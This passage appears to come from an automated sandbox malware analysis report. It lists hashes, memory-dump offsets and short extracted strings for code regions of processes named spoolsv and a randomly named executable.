              • Opcode Fuzzy Hash: 2b10022d8cbe09c05b806504e4dbe33603f497203cdad67dbdc7ffe766c44c20
              • Instruction Fuzzy Hash: 3531B171D086298FDBA4EF25C9487EDB6B1AF18341F5041EAD44DA3281CB785EC4CF40
              Strings
              Memory Dump Source
              • Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: "$($M$N
              • API String ID: 0-2673639397
              • Opcode ID: 62ff3130e6381cd014ee0762794b2c32f6b580d97bfb03732bf2fe9f33d5f98a
              • Instruction ID: c7cb3b885825b8006111a728fab5692cf881b9a7ef01f2c368e53f003adce17e
              • Opcode Fuzzy Hash: 62ff3130e6381cd014ee0762794b2c32f6b580d97bfb03732bf2fe9f33d5f98a
              • Instruction Fuzzy Hash: 5B01C8B1D092299FDBA5EF64D8443EDB6F1AF08340F5040EAD40DA6281DB389A84DF04
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 926e41aefd0f7c93b09fde4574c2ff906c0841010e81b5b3a61658cc5957ca09
              • Instruction ID: c2f1dc2749d7719ea21d480002fa4374fb2cb9c3c30a3964328170c3e82002cf
              • Opcode Fuzzy Hash: 926e41aefd0f7c93b09fde4574c2ff906c0841010e81b5b3a61658cc5957ca09
              • Instruction Fuzzy Hash: 8291AD71E1D94E8FEB84EB2C98197B9BBE1FB99350F4001BAC00DD32D6DF6928018B45
              Strings
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: NH$p\H
              • API String ID: 0-1232786254
              • Opcode ID: 871bb0e620d6b385fcdaa3d0b24a8a5a3c071c5e1f5868f0f9b551374e910b50
              • Instruction ID: c1c134f2f7b4dca6d3636492d8c374c285337b2ae96ba57749cea862f72ff095
              • Opcode Fuzzy Hash: 871bb0e620d6b385fcdaa3d0b24a8a5a3c071c5e1f5868f0f9b551374e910b50
              • Instruction Fuzzy Hash: 27E11571D1965E9EEB98EB68D4A57B8B7B1FF58340F1401BAD009E72C2CB396880CB45
              Strings
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: 8mH
              • API String ID: 0-1362847371
              • Opcode ID: 784f879b6948777fae186961f58a511ad15c03d952246f54eafb38d19c76be6a
              • Instruction ID: fb8943cc937b6686757d092532e7eaf1f9c16e2b012f52a9aa614d0a07c1b42e
              • Opcode Fuzzy Hash: 784f879b6948777fae186961f58a511ad15c03d952246f54eafb38d19c76be6a
              • Instruction Fuzzy Hash: 12511770D18A1D8FEB94EB68D859BADBBF1FF58340F50006AD00DE7292CB35A885CB40
              Strings
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: _
              • API String ID: 0-701932520
              • Opcode ID: 46176a0d6ee29f40196afd14c286aad8ee8b2373d6ce9fb93cda34045548372a
              • Instruction ID: 7df7222fbe86c5e711ca977d6415a9247cff1ad5601dccff524dd042d20d7ade
              • Opcode Fuzzy Hash: 46176a0d6ee29f40196afd14c286aad8ee8b2373d6ce9fb93cda34045548372a
              • Instruction Fuzzy Hash: 9941B13A90E66A9EEB557BA8B8150FD7760EF413B5F080277D508C90C3EF2D644582A9
              Strings
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: vH
              • API String ID: 0-2844672238
              • Opcode ID: df92ffa4f205c5bfe23ef0a55a1a403a1050ef360c7cc1ac136b77f95fb71686
              • Instruction ID: 08fcf3d01f565c9b77819bf4002b537342d68856987c7998d86dbe38aa2c2438
              • Opcode Fuzzy Hash: df92ffa4f205c5bfe23ef0a55a1a403a1050ef360c7cc1ac136b77f95fb71686
              • Instruction Fuzzy Hash: BF115B32D0854E9FE781FB68D8492B97BA0FF98380F8005B6D809C6192EF39A5448B44
              Strings
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: XyH
              • API String ID: 0-3434043539
              • Opcode ID: 747631d9b47718e3e89cd815f22fc89fff8c4bdc6b10ff94e86d7c53c85aefab
              • Instruction ID: bb58e2f1578bbd6a1b621325bd690ee2d4c1105ac3c6c31cba04da4c3ca9757e
              • Opcode Fuzzy Hash: 747631d9b47718e3e89cd815f22fc89fff8c4bdc6b10ff94e86d7c53c85aefab
              • Instruction Fuzzy Hash: 7A11B270C0D68A4FEB99EB6494692B97BE0FF19341F0404BED00AC70D2EF3A6484C718
              Strings
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID: XyH
              • API String ID: 0-3434043539
              • Opcode ID: 6dee8f4cb2b158b7cc8ca73ef5f41363a6c2c50505a710f56047cf895113a810
              • Instruction ID: 0d0ab006f9f184eaa68f9f887d50a5ca92d39e29d4078732fcfce0ab69147b72
              • Opcode Fuzzy Hash: 6dee8f4cb2b158b7cc8ca73ef5f41363a6c2c50505a710f56047cf895113a810
              • Instruction Fuzzy Hash: 52F0A430C1D69E8EEB98ABA4A8192BA7BE4FF55345F00047AE41DC20C1EF396494C618
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 02070d8018859fd2f5bcc414201ab544f4dfaf3c46b035679b0f39015f15b5b7
              • Instruction ID: 18736704d943087c56fdb82936106c4fa5e96afd950aaa94e7a438c14efe301a
              • Opcode Fuzzy Hash: 02070d8018859fd2f5bcc414201ab544f4dfaf3c46b035679b0f39015f15b5b7
              • Instruction Fuzzy Hash: F281BD31A0CA4A8FDB58EF5898615B977E2FF98750F14057AD44EC32C6CF35A8428789
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fbec958669d6e6936d6478e34c03c3698a0b994328f4cc9efa1d82aea4e0350a
              • Instruction ID: 054e3610091541b80a9a04dd0bec186f40f799df819f5643455ad6df006d0a95
              • Opcode Fuzzy Hash: fbec958669d6e6936d6478e34c03c3698a0b994328f4cc9efa1d82aea4e0350a
              • Instruction Fuzzy Hash: 7851C131A0CA9A8FDB48EF5898545BA77E2FF98340F14467ED44AC7281CF35E842C785
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a8420dd4589f316f39d229e44e35940949d241c972a58a755c05a0fb47c5d7c4
              • Instruction ID: eae9c6a1d1a1ebc0e0a80cf0bb28714b7fb2f1b21c09813c6c0194a987accc0e
              • Opcode Fuzzy Hash: a8420dd4589f316f39d229e44e35940949d241c972a58a755c05a0fb47c5d7c4
              • Instruction Fuzzy Hash: 66510434E1891E8EEB94EBA894556FDB7B1FF58350F50013AC409E7282DF35A8848B84
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2146dcdcd5176d5a53a46660dbb17b0c855b53a340c5414efe4b32648f8d5200
              • Instruction ID: 369525f9b6dbde11b9bfcb2385069d7b4b79612407010ec6f6010b6e0925a4f4
              • Opcode Fuzzy Hash: 2146dcdcd5176d5a53a46660dbb17b0c855b53a340c5414efe4b32648f8d5200
              • Instruction Fuzzy Hash: F45136B0D0850E8EEB54EBA8E4586EDB7F1FF48341F40007AD009E72E2DB3AA944CB55
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4a777d2ca39dd5b25257ca8dc0a64ab1bd49f18a42e80be41b75cda30164d594
              • Instruction ID: 479b24f2260ff72e618238c661fb0ae69150e2936ec0f565b230e1e5df06dde3
              • Opcode Fuzzy Hash: 4a777d2ca39dd5b25257ca8dc0a64ab1bd49f18a42e80be41b75cda30164d594
              • Instruction Fuzzy Hash: 8D413531E1DA8A4FE346E778A8551B9BBE0EF46380F0505BAD40CC71D2DF3AA8418365
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aaddf02c4655c2e2adb4877edac3338b5b8a17959d7304f9c6358e326848f50d
              • Instruction ID: 3bb5a1f0a7b33b594319b8933056782beef398e52f33050f1b65664b1dd17243
              • Opcode Fuzzy Hash: aaddf02c4655c2e2adb4877edac3338b5b8a17959d7304f9c6358e326848f50d
              • Instruction Fuzzy Hash: 71310674E1C95D8EEB94FB98A855AFCB7B2FF58340F504029C40DE3282DF2568818B44
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8d3008f4e3fb958f6a661c337609fcf1682c67918108722537cd7ce00dc60623
              • Instruction ID: f96bcb85cf91bc9ee608d8ebb9c6f28a109413f2f786c6a650e45613edaec95a
              • Opcode Fuzzy Hash: 8d3008f4e3fb958f6a661c337609fcf1682c67918108722537cd7ce00dc60623
              • Instruction Fuzzy Hash: 8F310A34E1C95D8FEB94FBA8A8556BCBBB2FF59340F501129C40DE72C2DF2568418B45
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: befd1572f8fd05ab75c1fbbf1b94e1b104cc2591d3e8cc23712562fb714b742c
              • Instruction ID: 4134bded61072123479a9746465f6f27c67a33dda00fac4d4833123e4382d1ac
              • Opcode Fuzzy Hash: befd1572f8fd05ab75c1fbbf1b94e1b104cc2591d3e8cc23712562fb714b742c
              • Instruction Fuzzy Hash: BC21D171E4C94ADFE781FB38A8591B9BBE0FF55780F0844B6C019C60D2EF3AA4868744
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7b3a21be8586ea6017e9fe4675ea3ccd0ac8eedfb35769038000a6b58272083d
              • Instruction ID: 0f0d3d2b0dd8d9c9ab9f78a3d2fce5c000099e055926303ed32309235231f136
              • Opcode Fuzzy Hash: 7b3a21be8586ea6017e9fe4675ea3ccd0ac8eedfb35769038000a6b58272083d
              • Instruction Fuzzy Hash: 0B21D27084D68A8FE742EB7488585A57FF0EF5B301F0804EAD448C71A2DA299956C712
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e6f1e07b7d8ade9eda3b24156f16e7a4b195977055c937e3113ade2013b8c15d
              • Instruction ID: 4d87180e52d3afd9ef46ce1b828b2dc2dea1803756a59f2088a1c4bc3ff91bc2
              • Opcode Fuzzy Hash: e6f1e07b7d8ade9eda3b24156f16e7a4b195977055c937e3113ade2013b8c15d
              • Instruction Fuzzy Hash: 7E116D3480D68E8FEB46FB28A8691B97BB0FF19341F0405BBD409C71D2EB3A5540C755
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ba216f430e8ae3bc0a0748d64615ee590fbd1fc6a38345d9636c6b124298e400
              • Instruction ID: b50fee94d9277a07c03da1f75b62ea0074b456af4fc902842cc7858030d8abfe
              • Opcode Fuzzy Hash: ba216f430e8ae3bc0a0748d64615ee590fbd1fc6a38345d9636c6b124298e400
              • Instruction Fuzzy Hash: 7E113C7090868E8FDB49EF68985A6BA7BA0FF18301F0409BAD419C61E1DB35A5408705
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 369b4a0275156a53f3240779008717c520c9b48bda950387339be8a6423a9e89
              • Instruction ID: 9b83a4eeddee46744f8415266310303c1b31e78ad7543c8b5fc2e69bc12fb359
              • Opcode Fuzzy Hash: 369b4a0275156a53f3240779008717c520c9b48bda950387339be8a6423a9e89
              • Instruction Fuzzy Hash: 3A115E70919A4E8FDB55FF6894592BABBE0FF18341F4404BAD809C6191EB36A550CB04
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 54384527e195c4c1febbbf2e400d379c5d30248dd25656e9269a16cbb8a35c18
              • Instruction ID: 0a61b1c68141a134a0504495b4cd64380ac9b535a97929d2a5ea3f617db3492a
              • Opcode Fuzzy Hash: 54384527e195c4c1febbbf2e400d379c5d30248dd25656e9269a16cbb8a35c18
              • Instruction Fuzzy Hash: 75018B30D0DA8E8FE751FB6898996A9BBE0FF59341F0508B6D40CCB1E2EB39E4448705
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 068ad99009f877a67c0e091cc67732976e8bf56b3a7776eb2e22c55137a68dd6
              • Instruction ID: 5f8464700e9961614f55f15e6c411e59e267f793cf26b7c7f497a0427e5ada77
              • Opcode Fuzzy Hash: 068ad99009f877a67c0e091cc67732976e8bf56b3a7776eb2e22c55137a68dd6
              • Instruction Fuzzy Hash: 9401883094890E8EEB88EFA4D4596BAB7A1FF58345F50457ED40ED21C1CB32B590CB48
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1276bcb77d4a5b3ee70d2043046c8aaf0dbf4bc478b49f1eb354d7d37fed53f8
              • Instruction ID: 011dbf3936beced2841900a1f08a067fad3ce2ae021242ba2fe504436b7307aa
              • Opcode Fuzzy Hash: 1276bcb77d4a5b3ee70d2043046c8aaf0dbf4bc478b49f1eb354d7d37fed53f8
              • Instruction Fuzzy Hash: 0D014C7092C95E9EEB98FF6894592B97BE0FF18341F10047AD81EC61D1DB36A550CB04
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a21c2008f112394804f2723b7d76aff8fce478871ebbaf0d0bfd97bed9c8f91d
              • Instruction ID: f95f4bd1f54e7b088a9979714df20b9cbee4c8a36bd6c778331829fcdcb86ff8
              • Opcode Fuzzy Hash: a21c2008f112394804f2723b7d76aff8fce478871ebbaf0d0bfd97bed9c8f91d
              • Instruction Fuzzy Hash: 3601B83080D64E8FE785BBA898882E9BBE0FF19341F1108B7D408C60A2EB39E0408701
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 445f264f4a5a7937a6e823272c25fe26fe520e44295191602ac5e50d3b3eb997
              • Instruction ID: f958b565d0da5d5c0b0f17f688774db20d571ce9d9c0daf720e96739ed88f03b
              • Opcode Fuzzy Hash: 445f264f4a5a7937a6e823272c25fe26fe520e44295191602ac5e50d3b3eb997
              • Instruction Fuzzy Hash: 4C017C31D1D6898FE742BB7498592A9BBE0FF5A340F4608B7D408CB0E6EB39A5448711
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 97e3179c79a80870f48dded40e3dec1a3f776aa9e4d5a553f54c19b60cddada2
              • Instruction ID: 6ebcf1aefbad5fc6cbbad08723d4a72b4e6f5d3cc6db557beb6003d7bfb45c06
              • Opcode Fuzzy Hash: 97e3179c79a80870f48dded40e3dec1a3f776aa9e4d5a553f54c19b60cddada2
              • Instruction Fuzzy Hash: 0301783084E6895FE752BB24A8591E9BBF0EF5A340F1609F7D408C70A2EB29A488C701
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2afc6e58faadcf6c5ed8c7da6ca6a2e02f806bf73cd8a7530a286b883c579cb8
              • Instruction ID: fe14383fbda70b3569826a5ac9a3338570b0a9d081931e0c6161190b6dd4ddaa
              • Opcode Fuzzy Hash: 2afc6e58faadcf6c5ed8c7da6ca6a2e02f806bf73cd8a7530a286b883c579cb8
              • Instruction Fuzzy Hash: E701813084D68D8FEB99EF6498592FA7BA0FF55341F4401BAE808C61D2DB76A590C748
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bd5297d9e589e3cdd971c5edff6c0ea3e8328f8eed23c68c053c0a6b2983bbd8
              • Instruction ID: 03f0d9bd9430800e5917033539ba426925f343a5a3a68921e3a04eac2f5e87d5
              • Opcode Fuzzy Hash: bd5297d9e589e3cdd971c5edff6c0ea3e8328f8eed23c68c053c0a6b2983bbd8
              • Instruction Fuzzy Hash: 3401693091C60E9EEB59FFA494586BEB6A1FF18345F50087EE40EC61D1EF36A190C604
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a20a9d1dc2973e82b5a4c844399df4438f2e76bf620303dc27359938546f3fce
              • Instruction ID: 0d34e3503ab2c76e255e1afb4d70996e7588637fa0f3f326699f7b31f72a8665
              • Opcode Fuzzy Hash: a20a9d1dc2973e82b5a4c844399df4438f2e76bf620303dc27359938546f3fce
              • Instruction Fuzzy Hash: B1016930919A0E9EEB59FB6494592F9B6E0FF18345F20087EE40EC21D1DF3AA550C614
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6e8b5c60ba081fbca45cec99eccf59363696fa664c103f320c053106ac7b2cd7
              • Instruction ID: 98259fe6c256589f4f4b4db629698e6425fe5e07bfbbbd45f391e04e25ef7d65
              • Opcode Fuzzy Hash: 6e8b5c60ba081fbca45cec99eccf59363696fa664c103f320c053106ac7b2cd7
              • Instruction Fuzzy Hash: 38F0193095990E9EEF58EB64C4596BEB6A0EF18345F1008BAE40AC21E1DF35A650C644
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4419cadfe5e78c60a04b8abfd16324ba685b78cc88df49cd2ec245cfd835cc59
              • Instruction ID: f29322c425aeb7b68296ccc4b746cde2b64093bfff7e7bab1bdb5c23375c4241
              • Opcode Fuzzy Hash: 4419cadfe5e78c60a04b8abfd16324ba685b78cc88df49cd2ec245cfd835cc59
              • Instruction Fuzzy Hash: 1211E870D0822A9FDB64DB14D8407A9B7F5FB54340F2481E6D00DA6291DB35AB859F40
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 67629f4f083bcf79e22c4666d9eb05c5a629d246680179e03d669c1ba160da95
              • Instruction ID: a75e3c16114ce80b910ea38368d7bce93e6b894ffca737e0f6a19ca2a454e09c
              • Opcode Fuzzy Hash: 67629f4f083bcf79e22c4666d9eb05c5a629d246680179e03d669c1ba160da95
              • Instruction Fuzzy Hash: 4FF0AF3085E64E8FEB44EFA4A4152FA77A4FF15344F40057AE80DC21C1DB36A590C788
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 92a290a1ffa73de15179aa3d845caa2117b9b90b2e56591fd41b6efcf143cc32
              • Instruction ID: 49552728c2b4dc5289109181fd75cddaa3fc3b2e4616c4df738b9661040f7569
              • Opcode Fuzzy Hash: 92a290a1ffa73de15179aa3d845caa2117b9b90b2e56591fd41b6efcf143cc32
              • Instruction Fuzzy Hash: C1F0F63180E3CA8FEB5AAF7498682B97F61FF16300F4508FAD409CA1D2EB39A414C701
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ebffa1743f989001854fa0aeb2eef0952f2e458b043d1c9b90609e994a2e6831
              • Instruction ID: 144701c22543c056bbca0f228ff3808602d9c20cd5504ce195c145d5b26e7fc8
              • Opcode Fuzzy Hash: ebffa1743f989001854fa0aeb2eef0952f2e458b043d1c9b90609e994a2e6831
              • Instruction Fuzzy Hash: CEF0EC70D189198FDB94EB14D446BE9B3B1FF58340F1042A6C40DD3195CB39AAC18F44
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14c18d002e14bab7342d4a0e7e4d8de3b8c05c377d7c851071d028fb46520306
              • Instruction ID: d5c40af3728225862300fa6d35674a29982b9da93a7e9066948253779828934e
              • Opcode Fuzzy Hash: 14c18d002e14bab7342d4a0e7e4d8de3b8c05c377d7c851071d028fb46520306
              • Instruction Fuzzy Hash: A7F0903080E6898FEB59AF6498191F9BBA0FF15301F4409BAD409C60D2DB3A9554C741
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f229e1dddd16b29397d69cafa091c1f7df0bbbc8552d58652ca9f17c06ed2608
              • Instruction ID: 3f5cbe17d7fa9f252cc062d9711879ee6581f1a1bd35e2be27ff7bb95c686ac1
              • Opcode Fuzzy Hash: f229e1dddd16b29397d69cafa091c1f7df0bbbc8552d58652ca9f17c06ed2608
              • Instruction Fuzzy Hash: 4DF0173090E51A8FEB50FB08D894BEEB7B1EB94351F105275D40AE32D5DF3869848B88
              Memory Dump Source
              • Source File: 00000014.00000002.2277685915.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_20_2_7ff848f20000_spoolsv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7e9ca4d7583cc8f705461048dc4beb42e52d049f8893f0e870aa8d78f3653465
              • Instruction ID: 61b3e899a86d2cca0eeb5c35793bf46570f9927ce7182dbbe8809faae2df24fd
              • Opcode Fuzzy Hash: 7e9ca4d7583cc8f705461048dc4beb42e52d049f8893f0e870aa8d78f3653465
              • Instruction Fuzzy Hash: 82F0523090811A9FEB60FB00C8087A8B3B0FF81340F1085B9D54EE62E0CF792E888B09
              Memory Dump Source
              • Source File: 00000016.00000002.2277835589.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ff848f10000_WHqeodkmYpJedFVKZpNEincEtJvAcD.jbxd
              Similarity
              • API ID:
